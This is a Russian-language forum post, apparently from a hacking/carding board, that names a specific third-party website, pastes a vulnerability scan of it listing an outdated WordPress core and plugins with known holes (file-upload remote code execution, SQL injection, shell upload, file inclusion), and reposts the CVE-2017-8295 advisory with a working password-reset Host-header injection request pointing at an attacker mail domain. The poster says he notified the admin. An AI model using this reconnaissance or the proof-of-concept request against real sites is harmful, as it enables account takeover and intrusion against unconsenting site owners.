1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

http://sakilake.com/ сайт с большими изъянами

Тема в разделе "Веб-Уязвимости | Эксплуатация", создана пользователем cyber_chinya, 27 авг 2017.

  1. TopicStarter Overlay
    cyber_chinya

    cyber_chinya

    Регистрация:
    12 ноя 2015
    Сообщения:
    51
    Симпатии:
    5
    Было скучно сегодня,решил я малость по рашке поработать сайтики потестировать на дыры в цмс. Никогда не работал по Рашке, ну дда ладно думаю админы тех сайтов мну простят,так как отписал им чтоб залатали изъяны...

    Выкладываю сюда один из сканированых сайтов и указываю на изъяны все:
    [+] URL: Войти или зарегистрироваться, чтобы увидеть ссылку.
    [+] Started: Sun Aug 27 21:04:16 2017

    [+] robots.txt available under: 'Войти или зарегистрироваться, чтобы увидеть ссылку.'
    [+] Interesting entry from robots.txt: Войти или зарегистрироваться, чтобы увидеть ссылку.
    [+] Interesting entry from robots.txt: Войти или зарегистрироваться, чтобы увидеть ссылку.
    [+] Interesting entry from robots.txt: Войти или зарегистрироваться, чтобы увидеть ссылку.
    [+] Interesting entry from robots.txt: Войти или зарегистрироваться, чтобы увидеть ссылку.
    [+] Interesting entry from robots.txt: Войти или зарегистрироваться, чтобы увидеть ссылку.
    [+] Interesting entry from robots.txt: Войти или зарегистрироваться, чтобы увидеть ссылку.
    [+] Interesting entry from robots.txt: Войти или зарегистрироваться, чтобы увидеть ссылку.
    [+] Interesting entry from robots.txt: Войти или зарегистрироваться, чтобы увидеть ссылку.
    [+] Interesting entry from robots.txt: Войти или зарегистрироваться, чтобы увидеть ссылку.
    [+] Interesting entry from robots.txt: */trackback
    [+] Interesting entry from robots.txt: */feed
    [+] Interesting entry from robots.txt: */comments
    [+] Interesting entry from robots.txt: */Movie1.swf
    [!] The WordPress 'Войти или зарегистрироваться, чтобы увидеть ссылку.' file exists exposing a version number
    [+] Interesting header: KEEP-ALIVE: timeout=30
    [+] Interesting header: LINK: <Войти или зарегистрироваться, чтобы увидеть ссылку. rel=shortlink
    [+] Interesting header: SERVER: nginx-reuseport/1.11.10
    [+] Interesting header: X-POWERED-BY: PHP/5.6.30

    [+] WordPress version 4.3.11 (Released on 2017-05-16) identified from meta generator, rss generator, rdf generator, atom generator, readme, links opml
    [!] 1 vulnerability identified from the version number

    [!] Title: WordPress 2.3-4.7.5 - Host Header Injection in Password Reset
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.

    [+] Enumerating installed plugins (only ones with known vulnerabilities) ...

    Time: 00:08:14 <===============================================================> (1546 / 1546) 100.00% Time: 00:08:14

    [+] We found 8 plugins:

    [+] Name: Ultimate_VC_Addons
    | Location: Войти или зарегистрироваться, чтобы увидеть ссылку.
    | Changelog: Войти или зарегистрироваться, чтобы увидеть ссылку.

    [!] We could not determine a version so all vulnerabilities are printed out

    [!] Title: Ultimate Addons for Visual Composer <= 3.16.11 - Authenticated XSS, CSRF, RCE
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Fixed in: 3.16.12

    [+] Name: cforms
    | Location: Войти или зарегистрироваться, чтобы увидеть ссылку.

    [!] We could not determine a version so all vulnerabilities are printed out

    [!] Title: Cforms & CformsII <= 14.7 - Remote Code Execution via Unauthorised File Upload
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.

    [!] Title: Cforms & CformsII <= 14.10.1 - CAPTCHA Bypass
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.

    [!] Title: Cforms <= 13.1 - 'lib_ajax.php' Cross-Site Scripting (XSS)
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Fixed in: 13.2

    [+] Name: jetpack - v3.7.2
    | Last updated: 2017-08-02T20:09:00.000Z
    | Location: Войти или зарегистрироваться, чтобы увидеть ссылку.
    | Readme: Войти или зарегистрироваться, чтобы увидеть ссылку.
    | Changelog: Войти или зарегистрироваться, чтобы увидеть ссылку.
    [!] The version is out of date, the latest version is 5.2.1

    [!] Title: Jetpack <= 3.9.1 - LaTeX HTML Element XSS
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Fixed in: 3.9.2

    [!] Title: Jetpack 2.0-4.0.2 - Shortcode Stored Cross-Site Scripting (XSS)
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Fixed in: 4.0.3

    [!] Title: Jetpack <= 4.0.3 - Multiple Vulnerabilities
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Fixed in: 4.0.4

    [+] Name: js_composer
    | Location: Войти или зарегистрироваться, чтобы увидеть ссылку.
    | Readme: Войти или зарегистрироваться, чтобы увидеть ссылку.

    [!] We could not determine a version so all vulnerabilities are printed out

    [!] Title: Visual Composer <= 4.7.3 - Multiple Unspecified Cross-Site Scripting (XSS)
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Fixed in: 4.7.4

    [+] Name: nextgen-gallery - v2.1.9
    | Last updated: 2017-08-01T15:00:00.000Z
    | Location: Войти или зарегистрироваться, чтобы увидеть ссылку.
    | Readme: Войти или зарегистрироваться, чтобы увидеть ссылку.
    | Changelog: Войти или зарегистрироваться, чтобы увидеть ссылку.
    [!] The version is out of date, the latest version is 2.2.12

    [!] Title: NextGEN Gallery <= 2.1.56 - Authenticated Local File Inclusion (LFI)
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Fixed in: 2.1.57

    [!] Title: NextGEN Gallery <= 2.1.77 - Unauthenticated SQL Injection
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Fixed in: 2.1.79

    [+] Name: revslider
    | Location: Войти или зарегистрироваться, чтобы увидеть ссылку.

    [!] We could not determine a version so all vulnerabilities are printed out

    [!] Title: WordPress Slider Revolution Local File Disclosure
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Fixed in: 4.1.5

    [!] Title: WordPress Slider Revolution Shell Upload
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Fixed in: 3.0.96

    [+] Name: shortcodes-ultimate - v4.9.8.1
    | Last updated: 2017-07-22T06:33:00.000Z
    | Location: Войти или зарегистрироваться, чтобы увидеть ссылку.
    | Readme: Войти или зарегистрироваться, чтобы увидеть ссылку.
    [!] The version is out of date, the latest version is 4.10.2

    [!] Title: Shortcodes Ultimate <= 4.9.9 - Authenticated Directory Traversal
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Fixed in: 4.10.0

    [+] Name: wordpress-seo - v2.3.4
    | Last updated: 2017-08-23T08:12:00.000Z
    | Location: Войти или зарегистрироваться, чтобы увидеть ссылку.
    | Readme: Войти или зарегистрироваться, чтобы увидеть ссылку.
    | Changelog: Войти или зарегистрироваться, чтобы увидеть ссылку.
    [!] The version is out of date, the latest version is 5.3.2

    [!] Title: Yoast SEO <= 3.2.4 - Subscriber Settings Sensitive Data Exposure
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Fixed in: 3.2.5

    [!] Title: Yoast SEO <= 3.2.5 - Unspecified Cross-Site Scripting (XSS)
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Fixed in: 3.3.0

    [!] Title: Yoast SEO <= 3.4.0 - Authenticated Stored Cross-Site Scripting (XSS)
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.
    Reference: Войти или зарегистрироваться, чтобы увидеть ссылку.


    Сама уязвимость данного сайта и не одна:
    ====================================================
    - Discovered by: Dawid Golunski (Войти или зарегистрироваться, чтобы увидеть ссылку.)
    - dawid[at]legalhackers.com
    - Войти или зарегистрироваться, чтобы увидеть ссылку.
    - Войти или зарегистрироваться, чтобы увидеть ссылку. (Войти или зарегистрироваться, чтобы увидеть ссылку.)


    - CVE-2017-8295
    - Release date: 03.05.2017
    - Revision 3.0
    - Last update: 04.05.2017
    - Severity: Medium/High
    ====================================================


    I. VULNERABILITY
    -------------------------

    WordPress Core <= 4.7.4 Potential Unauthorized Password Reset (0day)



    II. BACKGROUND
    -------------------------

    "WordPress is a free and open-source content management system
    (CMS) based on PHP and MySQL.

    WordPress was used by more than 27.5% of the top 10 million
    websites as of February 2017. WordPress is reportedly the
    most popular website management or blogging system in
    use on the Web, supporting more than 60 million websites."

    Войти или зарегистрироваться, чтобы увидеть ссылку.


    III. INTRODUCTION
    -------------------------

    Wordpress has a password reset feature that contains a vulnerability which
    might in some cases allow attackers to get hold of the password reset link
    without previous authentication.
    Such attack could lead to an attacker gaining unauthorised access to a
    victim's WordPress account.


    IV. DESCRIPTION
    -------------------------


    The vulnerability stems from WordPress using untrusted data by default
    when creating a password reset e-mail that is supposed to be delivered only
    to the e-mail associated with the owner's account.

    This can be observed in the following code snippet that creates a From
    email header before calling a PHP mail() function:

    ------[ wp-includes/pluggable.php ]------

    ...

    if ( !isset( $from_email ) ) {
    // Get the site domain and get rid of www.
    $sitename = strtolower( $_SERVER['SERVER_NAME'] );
    if ( substr( $sitename, 0, 4 ) == 'Войти или зарегистрироваться, чтобы увидеть ссылку..' ) {
    $sitename = substr( $sitename, 4 );
    }

    $from_email = 'wordpress@' . $sitename;
    }

    ...

    -----------------------------------------

    As we can see, Wordpress is using SERVER_NAME variable to get the hostname of
    the server in order to create a From/Return-Path header of the outgoing password
    reset email.
    However, major web servers such as Apache by default set the SERVER_NAME variable
    using the hostname supplied by the client (within the HTTP_HOST header):

    Войти или зарегистрироваться, чтобы увидеть ссылку.


    Because SERVER_NAME can be modified, an attacker could set it to an arbitrary
    domain of his choice e.g:

    attackers-mxserver.com

    which would result in Wordpress setting the $from_email to

    wordpress@attackers-mxserver.com

    and thus result in an outgoing email with From/Return-Path set to this
    malicious address.

    As to which e-mail header the attacker would be able to modify - From or
    Return-Path, it depends on the server environment. As can be read on
    Войти или зарегистрироваться, чтобы увидеть ссылку.
    The From header sets also Return-Path under Windows.


    Depending on the configuration of the mail server, it may result in
    an email that gets sent to the victim WordPress user with
    such malicious From/Return-Path address set in the email headers.


    This could possibly allow the attacker to intercept the email containing the
    password reset link in some cases requiring user interaction as well as without
    user interaction.

    3 _separate_ example scenarios (both the ones that require victim interaction
    and those that do not) include:


    1 * Attacker can perform a prior DoS attack on the victim's email account/server (e.g by
    sending multiple large files to exceed user's disk quota, attacking the DNS server etc)
    in order to prevent the password reset email from reaching the victim's account and bounce
    back to the malicous sender address that is pointed at the attacker (no user interaction required)

    --------

    2 * Some autoresponders might attach a copy of the email sent in the body of the
    auto-replied message (no user interaction required)

    --------

    3 * Sending multiple password reset emails to force the user to reply to the
    message to enquiry explanation for endless password reset emails.
    The reply containing the password link would then be sent to attacker. (user interaction required)

    --------

    etc.


    V. PROOF OF CONCEPT
    -------------------------

    If an attacker sends a request similar to the one below to a default Wordpress
    installation that is accessible by the IP address (IP-based vhost):

    -----[ HTTP Request ]----

    POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
    Host: injected-attackers-mxserver.com
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 56

    user_login=admin&redirect_to=&wp-submit=Get+New+Password

    ------------------------


    Wordpress will trigger the password reset function for the admin user account.

    Because of the modified HOST header, the SERVER_NAME will be set to
    the hostname of attacker's choice.
    As a result, Wordpress will pass the following headers and email body to the
    /usr/bin/sendmail wrapper:


    ------[ resulting e-mail ]-----

    Subject: [CompanyX WP] Password Reset
    Return-Path: <wordpress@attackers-mxserver.com>
    From: WordPress <wordpress@attackers-mxserver.com>
    Message-ID: <e6fd614c5dd8a1c604df2a732eb7b016@attackers-mxserver.com>
    X-Priority: 3
    MIME-Version: 1.0
    Content-Type: text/plain; charset=UTF-8
    Content-Transfer-Encoding: 8bit

    Someone requested that the password be reset for the following account:

    Войти или зарегистрироваться, чтобы увидеть ссылку.

    Username: admin

    If this was a mistake, just ignore this email and nothing will happen.

    To reset your password, visit the following address:

    <Войти или зарегистрироваться, чтобы увидеть ссылку.

    -------------------------------


    As we can see, fields Return-Path, From, and Message-ID, all have the attacker's
    domain set.


    The verification of the headers can be performed by replacing /usr/sbin/sendmail with a
    bash script of:

    #!/bin/bash
    cat > /tmp/outgoing-email



    VI. BUSINESS IMPACT
    -------------------------

    Upon a successfull exploitation, attacker may be able to reset user's password
    and gain unauthorized access to their WordPress account.


    VII. SYSTEMS AFFECTED
    -------------------------

    All WordPress versions up to the latest 4.7.4


    VIII. SOLUTION
    -------------------------

    No official solution available. As a temporary solution users can enable
    UseCanonicalName to enforce static SERVER_NAME value

    Войти или зарегистрироваться, чтобы увидеть ссылку.


    This issue has been reported to WordPress security team multiple times
    with the first report sent back in July 2016. It was reported both directly
    via security contact email, as well as via HackerOne website.

    As there has been no progress in this case , this advisory is finally
    released to the public without an official patch (0day).



    IX. REFERENCES
    -------------------------

    Войти или зарегистрироваться, чтобы увидеть ссылку.

    Войти или зарегистрироваться, чтобы увидеть ссылку.

    Vendor site:
    Войти или зарегистрироваться, чтобы увидеть ссылку.

    Войти или зарегистрироваться, чтобы увидеть ссылку.

    Войти или зарегистрироваться, чтобы увидеть ссылку.

    Войти или зарегистрироваться, чтобы увидеть ссылку.



    X. CREDITS
    -------------------------

    Discovered by

    Dawid Golunski
    dawid (at) legalhackers (dot) com

    Войти или зарегистрироваться, чтобы увидеть ссылку.
    Войти или зарегистрироваться, чтобы увидеть ссылку.



    Thanks to BeyondSecurity for help with contacting the vendor.


    XI. REVISION HISTORY
    -------------------------

    03.05.2017 - Advisory released, rev. 1

    04.05.2017 - Revision 2. Updated description/scenario section to highlight that
    scenarios are independent of each other and include ones that require
    victim interaction (such as a manual reply) and ones that do not
    (such as email account DoS leading to automatically bounced email by the receiving server)

    04.05.2017 - Revision 3. Updated 'solution' section to clarify and highlight numerous
    resolution attempts (both via direct WordPress security email contact and via HackerOne)


    XII. EXPLOITBOX - A PLAYGROUND FOR HACKERS

    Данный расклад опубликовал с целью чтоб так не делали господа сис админы которые могут тут присутствовать, а так же не стоит тут школьникам ломать данный сайт,так как по рашке грех работать, зачем срать где живёшь?

    А админу данного сайта отписал чтоб в скором времени закрыл дыру....
     
    • Like Like x 1
    Последнее редактирование: 27 авг 2017
    Метки:

Поделиться этой страницей

Загрузка...